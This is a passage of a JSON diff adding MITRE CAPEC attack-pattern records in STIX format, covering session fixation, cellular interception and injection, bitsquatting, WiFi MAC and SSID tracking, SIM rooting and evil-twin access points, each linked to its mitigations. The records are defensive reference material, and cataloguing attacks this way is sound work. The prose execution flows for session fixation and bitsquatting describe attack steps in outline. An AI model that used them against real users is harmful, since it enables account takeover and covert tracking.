"source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Traffic Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \"rogue\" BTS stations is poor in many areas and it is assumed that \"rogue\" BTS stations exist in urban areas." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.", + "id": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-609-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4813a8a-b41c-4718-8323-0bdb7fabf19c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "target_ref": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.", + "external_references": [ + { + "external_id": "CAPEC-61", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Session Fixation", + "external_id": "37", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Session-Fixation" + }, + { + "description": "Session fixation", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_fixation" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-601", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.html" + } + ], + "id": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Fixation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.", + "An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Setup the Attack: Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.

    2. Techniques
    The attacker chooses a predefined identifier that they know.
    The attacker creates a trap session for the victim.

Experiment

  1. Attract a Victim: Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.

    2. Techniques
    Attackers can put links on web sites (such as forums, blogs, or comment forms).
    Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.
    Attackers can email attack URLs to potential victims through spam and phishing techniques.

Exploit

  1. Abuse the Victim's Session: Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.

    2. Techniques
    The attacker loads the predefined session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Session identifiers that remain unchanged when the privilege levels change.", + "Permissive session management mechanism that accepts random user-generated session identifiers", + "Predictable session identifiers" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.", + "id": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d553a19-deeb-45df-b70d-71110b119c7c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad81b2e4-63b4-4d8e-9d96-4db93943afa2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6ee9dff-2bc5-4eae-a4d6-b3f868cb8569", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.", + "external_references": [ + { + "external_id": "CAPEC-610", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/610.html" + } + ], + "id": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Data Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Attackers can disrupt or deny mobile technology communications and operations.)", + "Modify Data (Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "High": "Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.", + "id": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-610-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4bbed6d4-6c57-4da2-ad62-002452b7960c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "target_ref": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.", + "external_references": [ + { + "external_id": "CAPEC-611", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/611.html" + }, + { + "description": "Artem Dinaburg, Bitsquatting: DNS Hijacking without exploitation, Raytheon", + "external_id": "REF-485", + "source_name": "reference_from_CAPEC", + "url": "http://media.blackhat.com/bh-us-11/Dinaburg/BH_US_11_Dinaburg_Bitsquatting_WP.pdf" + } + ], + "id": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BitSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

    2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.

    2. Techniques
    Register the BitSquatted domain.

Exploit

  1. Wait for a user to visit the domain: Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.

    2. Techniques
    Simply wait for an error in memory to occur, redirecting the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate all servers and perform redundant checks when using DNS hostnames.", + "id": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.", + "id": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70115677-16f7-4e4f-9e75-85108f13258f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-612", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/612.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "WiFi MAC Address Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Automatic randomization of WiFi MAC addresses", + "id": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ada034dd-bae1-45e0-992d-43931ede09d7", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of handset and retransmission device", + "id": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42428530-f329-4129-baf4-f136e130d080", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-613", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not enable the feature of \"Hidden SSIDs\" (also known as \"Network Cloaking\") – this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", + "id": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54e6bbee-8421-4ac9-ab72-d13af56bbbca", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequently change the SSID to new and unrelated values", + "id": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7cf4d3c7-8a07-460e-866b-2475c9ee85bb", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. These capabilities alone provide plenty of potential for abuse.", + "external_references": [ + { + "external_id": "CAPEC-614", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/614.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "description": "Karsten Nohl, Rooting SIM Cards, Security Research Labs", + "external_id": "REF-486", + "source_name": "reference_from_CAPEC", + "url": "https://srlabs.de/rooting-sim-cards/" + } + ], + "id": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Rooting SIM Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "A SIM card that relies on the DES cipher." + ], + "x_capec_skills_required": { + "Medium": "This is a sophisticated attack, but detailed techniques are published in open literature." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.", + "id": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-614-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73c5c39c-480b-411a-8be5-0ffe26aedee8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "target_ref": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to use \"adversary-in-the-middle\" (CAPEC-94) for all communications.", + "external_references": [ + { + "external_id": "CAPEC-615", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/615.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evil Twin Wi-Fi Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + 